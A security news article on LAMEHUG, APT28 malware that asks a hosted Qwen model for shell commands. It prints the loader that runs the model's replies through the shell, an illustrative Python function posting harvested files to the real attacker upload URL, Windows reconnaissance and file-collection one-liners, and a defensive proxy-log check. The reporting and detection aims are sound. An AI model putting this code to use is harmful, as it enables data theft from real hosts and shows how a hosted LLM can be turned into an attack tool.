First Known LLM-Powered Malware From APT28 Hackers Integrates AI Capabilities into Attack Methodology
The newly revealed LAMEHUG campaign signals a watershed moment for cyber defense: Russian state-aligned APT28 has fused a large language model (LLM) directly into live malware, allowing each infected host to receive tailor-made shell commands on the fly.
By invoking the Qwen2.5-Coder-32B-Instruct model through Hugging Face’s public API, the attackers sidestep traditional static payload constraints and achieve unprecedented flexibility.
LAMEHUG surfaced publicly on 17 July 2025, when Ukraine’s Computer Emergency Response Team (CERT-UA) issued an alert describing phishing e-mails that masqueraded as Ukrainian ministry correspondence and carried PyInstaller-compiled executables inside ZIP archives named “Додаток.pdf.zip.”
Once the archive is opened, a decoy PDF is displayed while the hidden binary executes in the background, keeping the victim unaware of the breach.
Cato Networks analysts who reverse-engineered multiple samples quickly identified the malware’s hallmark: every binary embeds base64-encoded prompts that are sent verbatim to the cloud-hosted LLM, which then returns an executable command string tailored to the host environment.
The choice of a commodity AI interface confers two strategic advantages. First, outbound requests resemble legitimate application traffic, frustrating signature-based intrusion detection systems.
Second, prompt editing grants the operators instant control over reconnaissance depth and exfiltration scope without redeploying code, a boon for rapidly shifting operational requirements.
Early telemetry shows Ukrainian government workstations were the initial testbed, reinforcing long-standing observations that APT28 often pilots experimental tooling against Kyiv before wider use.
CERT-UA’s bulletin highlights the breadth of data stolen: system inventories, network layouts, Active Directory hierarchies, and recursively harvested Office, PDF, and text documents are staged in %PROGRAMDATA%\info before exfiltration via either an SFTP tunnel to 144.126.202.227 or an HTTP POST to the compromised domain stayathomeclasses.com/slpw/up.php.
Because these channels rely on ordinary protocols, network defenders have struggled to differentiate malicious uploads from benign traffic.
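The HTTP leg, for instance, amounts to little more than posting the staged files to the attacker’s PHP endpoint. The short Python sketch below is purely illustrative; the function name, form-field layout, and use of the requests library are assumptions rather than recovered code, with only the staging path and URL drawn from CERT-UA’s indicators.

import requests
from pathlib import Path

STAGING_DIR = Path(r"C:\ProgramData\info")               # staging folder named in the CERT-UA bulletin
UPLOAD_URL = "http://stayathomeclasses.com/slpw/up.php"   # compromised upload endpoint named in the bulletin

def exfiltrate_staging_folder():
    # Post every staged file to the attacker-controlled endpoint, one HTTP request per file.
    for path in STAGING_DIR.rglob("*"):
        if path.is_file():
            with path.open("rb") as fh:
                requests.post(UPLOAD_URL, files={"file": (path.name, fh)}, timeout=30)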
Infection Mechanism: AI-Driven Command Generation
When the lure executable launches, it spins up a thread that runs a condensed Python loader:
import subprocess
from base64 import b64decode

def LLM_QUERY_EX():
    # Decode the embedded base64 prompt and wrap it in a chat request for the hosted Qwen model.
    prompt = {'messages': [{'role': 'user',
                            'content': b64decode(prompt_b64_p1).decode()}],
              'temperature': 0.1,
              'model': 'Qwen/Qwen2.5-Coder-32B-Instruct'}
    # The model's reply is treated as a ready-to-run command line and executed via the shell.
    cmd = query_text(prompt)
    subprocess.run(cmd, shell=True,
                   stdout=subprocess.PIPE,
                   stderr=subprocess.STDOUT)
[Image: decoy document that the user sees while the malware is being executed (Source: Cato Networks)]
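The query_text helper is not included in the published snippet. A minimal sketch of what such a call could look like, assuming the standard huggingface_hub client and a placeholder API token (neither confirmed from the sample), is:

from huggingface_hub import InferenceClient  # assumption: the official client; the sample's actual HTTP code is not public

def query_text(prompt: dict) -> str:
    # Forward the decoded prompt to the hosted Qwen model and return its reply verbatim.
    client = InferenceClient(model=prompt['model'], token='hf_xxx')  # 'hf_xxx' is a placeholder token
    response = client.chat_completion(messages=prompt['messages'],
                                      temperature=prompt['temperature'])
    return response.choices[0].message.content.strip()

To a proxy or firewall, such a request is indistinguishable from any legitimate application calling the same public inference API.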
The first prompt instructs the LLM to “make a list of commands to gather computer, hardware, service, and network information … and append each result to C:\Programdata\info\info.txt. Return only commands, without markdown.” The returned one-liner resembles:
cmd.exe /c "mkdir %PROGRAMDATA%info && systeminfo >> %PROGRAMDATA%infoinfo.txt && wmic cpu get /format:list >> %PROGRAMDATA%infoinfo.txt && ..."
A second prompt follows, ordering the recursive collection of Office, PDF, and TXT files from the user’s Documents, Downloads, and Desktop directories into the same staging folder.
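CERT-UA’s bulletin does not quote the exact string returned for this second prompt; by analogy with the first one-liner, a plausible (illustrative, not recovered) reply covering the Documents folder alone might resemble:

cmd.exe /c for /r "%USERPROFILE%\Documents" %f in (*.doc *.docx *.xls *.xlsx *.pdf *.txt) do copy "%f" "%PROGRAMDATA%\info\"

with analogous loops for the Downloads and Desktop directories.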
By delegating command synthesis to the cloud model, the binary remains compact, and any blue-team attempt to pattern-match on hard-coded strings is defeated.
Unless defenders monitor outbound AI queries or impose least-privilege egress rules, LAMEHUG’s modular architecture guarantees the operators fresh system insight with every execution cycle.
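As one starting point for that egress monitoring, defenders could sweep proxy logs for workstations reaching hosted AI inference endpoints. The snippet below is a rough sketch whose log schema, column names, and allowlist values are assumptions for illustration, not a product-specific format.

import csv

ALLOWED_CLIENTS = {"10.0.5.21"}            # hosts with a sanctioned reason to call AI APIs (example value)
AI_API_DOMAINS = ("huggingface.co",)       # extend with other hosted-inference providers as required

def flag_ai_egress(proxy_log_csv: str) -> None:
    # Assumes a CSV export with 'client_ip' and 'dest_host' columns (an illustrative schema).
    with open(proxy_log_csv, newline="") as fh:
        for row in csv.DictReader(fh):
            if row["dest_host"].endswith(AI_API_DOMAINS) and row["client_ip"] not in ALLOWED_CLIENTS:
                print(f"Suspicious AI-API egress: {row['client_ip']} -> {row['dest_host']}")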